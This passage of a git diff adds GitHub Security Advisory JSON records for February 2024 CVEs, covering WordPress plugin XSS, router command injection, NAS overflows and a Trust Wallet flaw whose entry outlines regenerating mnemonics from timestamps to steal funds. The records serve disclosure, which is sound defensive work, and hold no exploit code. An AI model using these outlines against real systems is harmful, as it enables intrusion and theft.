+++ b/advisories/unreviewed/2024/02/GHSA-h8pv-m5jr-4f99/GHSA-h8pv-m5jr-4f99.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h8pv-m5jr-4f99", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0823" + ], + "details": "The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Link To' url in carousels in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0823" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/elements/logo-carousel/logo-carousel.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2c5cdc3f-eaa6-4d0b-9e75-5483c723e15a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h9g9-92v6-jw8x/GHSA-h9g9-92v6-jw8x.json b/advisories/unreviewed/2024/02/GHSA-h9g9-92v6-jw8x/GHSA-h9g9-92v6-jw8x.json new file mode 100644 index 0000000000000..647e9e5696312 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h9g9-92v6-jw8x/GHSA-h9g9-92v6-jw8x.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h9g9-92v6-jw8x", + "modified": "2024-02-02T00:31:27Z", + "published": "2024-02-02T00:31:27Z", + "aliases": [ + "CVE-2023-47867" + ], + "details": "\n\n\n\n\n\n\n\n\nMachineSense FeverWarn devices are configured as Wi-Fi hosts in a way that attackers within range could connect to the device's web services and compromise the device.\n\n\n\n\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47867" + }, + { + "type": "WEB", + "url": "https://machinesense.com/pages/about-machinesense" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-025-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hcm7-vvxh-5crx/GHSA-hcm7-vvxh-5crx.json b/advisories/unreviewed/2024/02/GHSA-hcm7-vvxh-5crx/GHSA-hcm7-vvxh-5crx.json new file mode 100644 index 0000000000000..9208343109803 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hcm7-vvxh-5crx/GHSA-hcm7-vvxh-5crx.json 
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hcm7-vvxh-5crx", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-23660" + ], + "details": "The Binance Trust Wallet app for iOS in commit 3cd6e8f647fbba8b5d8844fcd144365a086b629f, git tag 0.0.4 misuses the trezor-crypto library and consequently generates mnemonic words for which the device time is the only entropy source, leading to economic losses, as exploited in the wild in July 2023. An attacker can systematically generate mnemonics for each timestamp within an applicable timeframe, and link them to specific wallet addresses in order to steal funds from those wallets.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23660" + }, + { + "type": "WEB", + "url": "https://milksad.info/posts/research-update-5/" + }, + { + "type": "WEB", + "url": "https://secbit.io/blog/en/2024/01/19/trust-wallets-fomo3d-summer-vuln/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T20:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hfp7-mmwm-2mmx/GHSA-hfp7-mmwm-2mmx.json b/advisories/unreviewed/2024/02/GHSA-hfp7-mmwm-2mmx/GHSA-hfp7-mmwm-2mmx.json new file mode 100644 index 0000000000000..24c458c48c3d7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hfp7-mmwm-2mmx/GHSA-hfp7-mmwm-2mmx.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hfp7-mmwm-2mmx", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-41279" + ], + "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41279" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-38" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hg2h-hf62-jjm8/GHSA-hg2h-hf62-jjm8.json b/advisories/unreviewed/2024/02/GHSA-hg2h-hf62-jjm8/GHSA-hg2h-hf62-jjm8.json new file mode 100644 index 0000000000000..021878a5f9d98 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hg2h-hf62-jjm8/GHSA-hg2h-hf62-jjm8.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hg2h-hf62-jjm8", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2024-1079" + ], + "details": "The Quiz Maker plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ays_show_results() function in all versions up to, and including, 6.5.2.4. This makes it possible for unauthenticated attackers to fetch arbitrary quiz results which can contain PII.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1079" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3032035/quiz-maker/tags/6.5.2.5/admin/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/602df370-cd5b-46dc-a653-6522aef0c62f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T08:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hgwr-gpf8-663p/GHSA-hgwr-gpf8-663p.json b/advisories/unreviewed/2024/02/GHSA-hgwr-gpf8-663p/GHSA-hgwr-gpf8-663p.json new file mode 100644 index 0000000000000..b65e85921e69f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hgwr-gpf8-663p/GHSA-hgwr-gpf8-663p.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hgwr-gpf8-663p", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2023-47617" + ], + "details": "A post authentication command injection vulnerability exists when configuring the web group member of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47617" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1858" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hh96-8ff8-hwhp/GHSA-hh96-8ff8-hwhp.json b/advisories/unreviewed/2024/02/GHSA-hh96-8ff8-hwhp/GHSA-hh96-8ff8-hwhp.json new file mode 100644 index 0000000000000..4162d4bb830da --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hh96-8ff8-hwhp/GHSA-hh96-8ff8-hwhp.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hh96-8ff8-hwhp", + "modified": "2024-02-02T03:30:31Z", + "published": "2024-02-02T03:30:31Z", + "aliases": [ + "CVE-2023-50326" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 275107.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50326" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275107" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-307" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T01:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hmgm-p594-v4hg/GHSA-hmgm-p594-v4hg.json b/advisories/unreviewed/2024/02/GHSA-hmgm-p594-v4hg/GHSA-hmgm-p594-v4hg.json new file mode 100644 index 0000000000000..e2fe1e47e3451 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hmgm-p594-v4hg/GHSA-hmgm-p594-v4hg.json 
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hmgm-p594-v4hg", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2024-24026" + ], + "details": "An arbitrary File upload vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions at com.java2nb.system.controller.SysUserController: uploadImg(). An attacker can pass in specially crafted filename parameter to perform arbitrary File download.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24026" + }, + { + "type": "WEB", + "url": "https://github.com/201206030/novel-plus" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24026.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T01:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hmwv-4vph-2r3h/GHSA-hmwv-4vph-2r3h.json b/advisories/unreviewed/2024/02/GHSA-hmwv-4vph-2r3h/GHSA-hmwv-4vph-2r3h.json new file mode 100644 index 0000000000000..432b741be33d5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hmwv-4vph-2r3h/GHSA-hmwv-4vph-2r3h.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hmwv-4vph-2r3h", + "modified": "2024-02-02T09:30:22Z", + "published": "2024-02-02T09:30:22Z", + "aliases": [ + "CVE-2024-21845" + ], + "details": "\nin OpenHarmony v4.0.0 and prior versions allow a local attacker cause heap overflow through integer overflow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21845" + }, + { + "type": "WEB", + "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-190" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hqm8-gpp6-j34p/GHSA-hqm8-gpp6-j34p.json b/advisories/unreviewed/2024/02/GHSA-hqm8-gpp6-j34p/GHSA-hqm8-gpp6-j34p.json new file mode 100644 index 0000000000000..27897aa28e464 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hqm8-gpp6-j34p/GHSA-hqm8-gpp6-j34p.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hqm8-gpp6-j34p", + "modified": "2024-02-06T06:30:32Z", + "published": "2024-02-06T06:30:32Z", + "aliases": [ + "CVE-2023-43534" + ], + "details": "Memory corruption while validating the TID to Link Mapping action request frame, when a station connects to an access point.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43534" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hvff-fx7p-9p3g/GHSA-hvff-fx7p-9p3g.json b/advisories/unreviewed/2024/02/GHSA-hvff-fx7p-9p3g/GHSA-hvff-fx7p-9p3g.json new file mode 100644 index 0000000000000..8f006381fc0a3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hvff-fx7p-9p3g/GHSA-hvff-fx7p-9p3g.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hvff-fx7p-9p3g", + "modified": "2024-02-07T15:30:48Z", + "published": "2024-02-07T15:30:48Z", + "aliases": [ + "CVE-2024-24186" + ], + "details": "Jsish v3.5.0 (commit 42c694c) was discovered to contain a stack-overflow via the component IterGetKeysCallback at /jsish/src/jsiValue.c.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24186" + }, + { + "type": "WEB", + "url": "https://github.com/pcmacdon/jsish/issues/98" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T14:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hvwp-rfc8-3www/GHSA-hvwp-rfc8-3www.json b/advisories/unreviewed/2024/02/GHSA-hvwp-rfc8-3www/GHSA-hvwp-rfc8-3www.json new file mode 100644 index 0000000000000..4ed4b7eddf9dd --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hvwp-rfc8-3www/GHSA-hvwp-rfc8-3www.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hvwp-rfc8-3www", + "modified": "2024-02-07T06:35:21Z", + "published": "2024-02-07T06:35:21Z", + "aliases": [ + "CVE-2024-0256" + ], + "details": "The Starbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Profile Display Name and Social Settings in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0256" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3029599/starbox" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0eafe473-9177-47c4-aa1e-2350cb827447?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T05:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-hxw7-jqv7-6h7r/GHSA-hxw7-jqv7-6h7r.json b/advisories/unreviewed/2024/02/GHSA-hxw7-jqv7-6h7r/GHSA-hxw7-jqv7-6h7r.json new file mode 100644 index 0000000000000..d38942305d5e3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-hxw7-jqv7-6h7r/GHSA-hxw7-jqv7-6h7r.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hxw7-jqv7-6h7r", + "modified": "2024-02-06T03:32:59Z", + "published": "2024-02-06T03:32:59Z", + "aliases": [ + "CVE-2023-47889" + ], + "details": "The Android application BINHDRM26 com.bdrm.superreboot 1.0.3, exposes several critical actions through its exported broadcast receivers. These exposed actions can allow any app on the device to send unauthorized broadcasts, leading to unintended consequences. The vulnerability is particularly concerning because these actions include powering off, system reboot & entering recovery mode.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47889" + }, + { + "type": "WEB", + "url": "https://github.com/actuator/com.bdrm.superreboot/blob/main/CWE-925.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j2p8-grvm-cx5w/GHSA-j2p8-grvm-cx5w.json b/advisories/unreviewed/2024/02/GHSA-j2p8-grvm-cx5w/GHSA-j2p8-grvm-cx5w.json new file mode 100644 index 0000000000000..65d5619496048 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j2p8-grvm-cx5w/GHSA-j2p8-grvm-cx5w.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j2p8-grvm-cx5w", + "modified": "2024-02-01T12:30:22Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-51677" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magazine3 Schema & Structured Data for WP & AMP allows Stored XSS.This issue affects Schema & Structured Data for WP & AMP: from n/a through 1.23.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51677" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/schema-and-structured-data-for-wp/wordpress-schema-structured-data-for-wp-amp-plugin-1-23-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j3pp-77jw-4qv6/GHSA-j3pp-77jw-4qv6.json b/advisories/unreviewed/2024/02/GHSA-j3pp-77jw-4qv6/GHSA-j3pp-77jw-4qv6.json new file mode 100644 index 0000000000000..666a5ce7010ca --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j3pp-77jw-4qv6/GHSA-j3pp-77jw-4qv6.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j3pp-77jw-4qv6", + "modified": "2024-02-02T21:31:29Z", + "published": "2024-02-02T21:31:29Z", + "aliases": [ + "CVE-2024-1190" + ], + "details": "A vulnerability was found in Global Scape CuteFTP 9.3.0.3 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation of the argument Host/Username/Password leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252680. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1190" + }, + { + "type": "WEB", + "url": "https://fitoxs.com/vuldb/16-exploit-perl.txt" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252680" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252680" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j428-8h66-82p9/GHSA-j428-8h66-82p9.json b/advisories/unreviewed/2024/02/GHSA-j428-8h66-82p9/GHSA-j428-8h66-82p9.json new file mode 100644 index 0000000000000..6a95ddb4efb27 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j428-8h66-82p9/GHSA-j428-8h66-82p9.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j428-8h66-82p9", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20818" + ], + "details": "Out out bounds Write vulnerabilities in svc1td_vld_elh of libsthmbc.so prior to SMR Feb-2024 Release 1 allows local attackers to trigger buffer overflow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20818" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j5jm-rppg-h4j8/GHSA-j5jm-rppg-h4j8.json b/advisories/unreviewed/2024/02/GHSA-j5jm-rppg-h4j8/GHSA-j5jm-rppg-h4j8.json new file mode 100644 index 0000000000000..638387d242733 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j5jm-rppg-h4j8/GHSA-j5jm-rppg-h4j8.json 
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j5jm-rppg-h4j8", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-45028" + ], + "details": "An uncontrolled resource consumption vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to launch a denial-of-service (DoS) attack via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45028" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400", + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j6qm-xgxc-g34g/GHSA-j6qm-xgxc-g34g.json b/advisories/unreviewed/2024/02/GHSA-j6qm-xgxc-g34g/GHSA-j6qm-xgxc-g34g.json new file mode 100644 index 0000000000000..173335a239322 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j6qm-xgxc-g34g/GHSA-j6qm-xgxc-g34g.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j6qm-xgxc-g34g", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20015" + ], + "details": "In telephony, there is a possible escalation of privilege due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08441419; Issue ID: ALPS08441419.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20015" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j839-f55x-qp69/GHSA-j839-f55x-qp69.json b/advisories/unreviewed/2024/02/GHSA-j839-f55x-qp69/GHSA-j839-f55x-qp69.json new file mode 100644 index 0000000000000..276be1f72b2d3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j839-f55x-qp69/GHSA-j839-f55x-qp69.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j839-f55x-qp69", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-22388" + ], + "details": "\nCertain configuration available in the communication channel for encoders could expose sensitive data when reader configuration cards are programmed. This data could include credential and device administration keys.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22388" + }, + { + "type": "WEB", + "url": "https://support.hidglobal.com/" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-037-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j973-rvvm-fh3w/GHSA-j973-rvvm-fh3w.json b/advisories/unreviewed/2024/02/GHSA-j973-rvvm-fh3w/GHSA-j973-rvvm-fh3w.json new file mode 100644 index 0000000000000..24a93ebd72e52 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j973-rvvm-fh3w/GHSA-j973-rvvm-fh3w.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j973-rvvm-fh3w", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20826" + ], + "details": "Implicit intent hijacking vulnerability in UPHelper library prior to version 4.0.0 allows local attackers to access sensitive information via implicit intent.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20826" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-j9rf-q3p6-99gv/GHSA-j9rf-q3p6-99gv.json 